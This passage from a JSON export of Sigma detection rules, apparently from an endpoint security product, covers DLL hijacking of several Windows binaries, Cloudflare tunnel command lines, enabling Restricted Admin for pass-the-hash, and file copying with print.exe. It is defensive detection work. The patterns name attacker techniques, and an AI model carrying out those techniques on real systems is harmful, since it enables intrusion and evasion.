"rule_name": "DLL Hijacking via fxssvc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fxssvc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nThis rule alerts when an fxssvc.exe instance running outside System32, SysWOW64 or WinSxS loads one of the targeted DLLs from a non-system directory and that DLL is not signed by Microsoft Windows; loads by the original fxssvc.exe in a system directory are filtered out.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f759930-847b-4235-9966-1f185ec8f57a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094433Z",
"creation_date": "2026-03-23T11:45:34.094435Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094440Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_qappsrv.yml",
"content": "title: DLL Hijacking via qappsrv.exe\nid: 7f759930-847b-4235-9966-1f185ec8f57a\ndescription: |\n Detects potential Windows DLL Hijacking via qappsrv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'qappsrv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\netapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f759930-847b-4235-9966-1f185ec8f57a",
"rule_name": "DLL Hijacking via qappsrv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via qappsrv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable to a non-standard directory and planting the malicious DLL (here netapi32.dll) within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f7c3ab6-0a47-45d3-a6d4-b483fe3bcdb5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593327Z",
"creation_date": "2026-03-23T11:45:34.593330Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593338Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://itm4n.github.io/windows-dll-hijacking-clarified/",
"https://twitter.com/Alh4zr3d/status/1567937830911111168",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wptsextensions.yml",
"content": "title: DLL Hijacking via WptsExtension.dll\nid: 7f7c3ab6-0a47-45d3-a6d4-b483fe3bcdb5\ndescription: |\n Detects a potential Windows DLL Hijacking via WptsExtension.dll.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://itm4n.github.io/windows-dll-hijacking-clarified/\n - https://twitter.com/Alh4zr3d/status/1567937830911111168\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\WptsExtensions.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Company:\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f7c3ab6-0a47-45d3-a6d4-b483fe3bcdb5",
"rule_name": "DLL Hijacking via WptsExtensions.dll",
"rule_description": "Detects a potential Windows DLL Hijacking via WptsExtensions.dll.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by placing a malicious WptsExtensions.dll where a victim application's search order will find it before (or instead of) the expected library.\nThis rule alerts on any process loading a WptsExtensions.dll that is not signed under a Microsoft company name, regardless of the loading process.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f7ec5e5-0ec3-44e4-8cf0-cf1aaf2c3e5a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079468Z",
"creation_date": "2026-03-23T11:45:34.079470Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079474Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hvax64.yml",
"content": "title: DLL Hijacking via hvax64.exe\nid: 7f7ec5e5-0ec3-44e4-8cf0-cf1aaf2c3e5a\ndescription: |\n Detects potential Windows DLL Hijacking via hvax64.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'hvax64.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\KDSTUB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f7ec5e5-0ec3-44e4-8cf0-cf1aaf2c3e5a",
"rule_name": "DLL Hijacking via hvax64.exe",
"rule_description": "Detects potential Windows DLL Hijacking via hvax64.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nThis rule alerts when an hvax64.exe instance running outside System32, SysWOW64 or WinSxS loads KDSTUB.dll from a non-system directory and that DLL is not signed by Microsoft Windows; loads by the original hvax64.exe in a system directory are filtered out.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f9cb333-f034-466f-aad5-843bbfe120c6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612759Z",
"creation_date": "2026-03-23T11:45:34.612763Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612770Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/cloudflare/cloudflared",
"https://blog.reconinfosec.com/emergence-of-akira-ransomware-group",
"https://attack.mitre.org/techniques/T1572/"
],
"name": "t1572_linux_cloudfare_tunneling_cmdline.yml",
"content": "title: Cloudflare Tunneling via Command-line\nid: 7f9cb333-f034-466f-aad5-843bbfe120c6\ndescription: |\n Detects a command-line associated with the Cloudflare Tunnel Client.\n Cloudflare is a tunneling daemon that proxies traffic from the Cloudflare network.\n Threat actors such as the Akira Ransomware Group use this client to silently tunnel their traffic into internal networks.\n It is recommended to investigate the process' and daemon's network activity to determine the legitimacy of this action.\nreferences:\n - https://github.com/cloudflare/cloudflared\n - https://blog.reconinfosec.com/emergence-of-akira-ransomware-group\n - https://attack.mitre.org/techniques/T1572/\ndate: 2023/05/11\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1572\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Tunneling\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - 'tunnel * run --token'\n - 'tunnel * --config * run'\n\n exclusion_containers:\n Ancestors|contains: '/usr/bin/containerd-shim-runc-v2'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f9cb333-f034-466f-aad5-843bbfe120c6",
"rule_name": "Cloudflare Tunneling via Command-line",
"rule_description": "Detects a command-line associated with the Cloudflare Tunnel client (cloudflared).\ncloudflared is a tunneling daemon that establishes an outbound connection to the Cloudflare network and proxies traffic from it to local services.\nThreat actors such as the Akira Ransomware Group use this client to silently tunnel their traffic into internal networks.\nNote that executions whose process ancestry includes containerd-shim-runc-v2 (i.e. started inside a container) are excluded and will not alert.\nIt is recommended to investigate the process' and daemon's network activity to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-05-11",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7ff782ca-cc4a-457f-899f-ba46c4f967a0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081538Z",
"creation_date": "2026-03-23T11:45:34.081540Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081544Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://strontic.github.io/xcyclopedia/library/msedge_pwa_launcher.exe-42D1DD5306CDE965B76373E4E2E210A3.html"
],
"name": "t1574_001_dll_hijacking_msedgepwalauncher.yml",
"content": "title: DLL Hijacking via msedge_pwa_launcher.exe\nid: 7ff782ca-cc4a-457f-899f-ba46c4f967a0\ndescription: |\n Detects potential Windows DLL Hijacking via msedge_pwa_launcher.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://strontic.github.io/xcyclopedia/library/msedge_pwa_launcher.exe-42D1DD5306CDE965B76373E4E2E210A3.html\ndate: 2023/11/17\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msedge_pwa_launcher.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\USERENV.dll'\n - '\\combase.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Microsoft\\EdgeCore\\'\n - '?:\\Program Files\\Microsoft\\EdgeWebView\\Application\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7ff782ca-cc4a-457f-899f-ba46c4f967a0",
"rule_name": "DLL Hijacking via msedge_pwa_launcher.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msedge_pwa_launcher.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-11-17",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8002bad8-8a9d-4911-9321-bd2bc2322429",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620390Z",
"creation_date": "2026-03-23T11:45:34.620392Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620396Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657",
"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn408190(v=ws.11)",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_enable_restricted_admin.yml",
"content": "title: Restricted Admin Enabled via Registry\nid: 8002bad8-8a9d-4911-9321-bd2bc2322429\ndescription: |\n Detects when the Restricted Admin feature is enabled by setting a specific registry key.\n Adversaries may enable Restricted Admin as it allows connections over RDP using the Pass-the-Hash technique.\n It is recommended to investigate this action to determine its legitimacy and investigate any suspicious authentications using a privileged account.\nreferences:\n - https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657\n - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn408190(v=ws.11)\n - https://attack.mitre.org/techniques/T1112/\ndate: 2024/02/13\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin'\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8002bad8-8a9d-4911-9321-bd2bc2322429",
"rule_name": "Restricted Admin Enabled via Registry",
"rule_description": "Detects when the Restricted Admin feature is enabled by setting the DisableRestrictedAdmin value under HKLM\\System\\CurrentControlSet\\Control\\Lsa to 0.\nAdversaries may enable Restricted Admin because it allows RDP connections to authenticate with an NTLM hash (Pass-the-Hash) instead of a cleartext password.\nChanges applied by the Group Policy client service (gpsvc hosted in svchost.exe, running as SYSTEM under services.exe) are excluded, so a GPO-driven rollout will not alert.\nIt is recommended to investigate this action to determine its legitimacy and investigate any suspicious authentications using a privileged account.\n",
"rule_creation_date": "2024-02-13",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "80198e01-52f5-4bde-b050-72b38a462907",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295850Z",
"creation_date": "2026-03-23T11:45:35.295853Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295860Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Print/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1564/004/"
],
"name": "t1105_file_copied_via_print.yml",
"content": "title: File Copied via print.exe\nid: 80198e01-52f5-4bde-b050-72b38a462907\ndescription: |\n Detects abuse of the Windows print.exe binary to copy files, which may indicate living-off-the-land activity used for defense evasion.\n Attackers can leverage this native utility to copy or stage files using a trusted Windows component, potentially evading security controls.\n It is recommended to analyze the execution chain associated with this alert to determine its legitimacy.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Print/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1564/004/\ndate: 2026/01/28\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1564.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Print\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'Print.exe'\n CommandLine|contains:\n - 'print /D:\\\\\\\\'\n - 'print /D:?:'\n - 'print.exe /D:\\\\\\\\'\n - 'print.exe /D:?:'\n ParentImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\public\\'\n - '?:\\users\\\\*\\appdata\\'\n - '?:\\\\?Recycle.Bin\\'\n GrandparentImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\public\\'\n - '?:\\users\\\\*\\appdata\\'\n - '?:\\\\?Recycle.Bin\\'\n CurrentDirectory|startswith: '?:\\'\n\n condition: selection\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "80198e01-52f5-4bde-b050-72b38a462907",
"rule_name": "File Copied via print.exe",
"rule_description": "Detects abuse of the Windows print.exe binary to copy files, which may indicate living-off-the-land activity used for defense evasion.\nAttackers can leverage this native utility to copy or stage files using a trusted Windows component, potentially evading security controls.\nIt is recommended to analyze the execution chain associated with this alert to determine its legitimacy.\n",
"rule_creation_date": "2026-01-28",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1564.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "801a7bc0-ff7d-467e-91c6-47048e296a77",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595616Z",
"creation_date": "2026-03-23T11:45:34.595619Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595627Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-cmdexec-job-step?view=sql-server-2016",
"https://book.shentoushi.top/Databases/Mssql.html",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1059/003/",
"https://attack.mitre.org/techniques/T1505/001/"
],
"name": "t1190_mssql_job_cmdexec_cmd.yml",
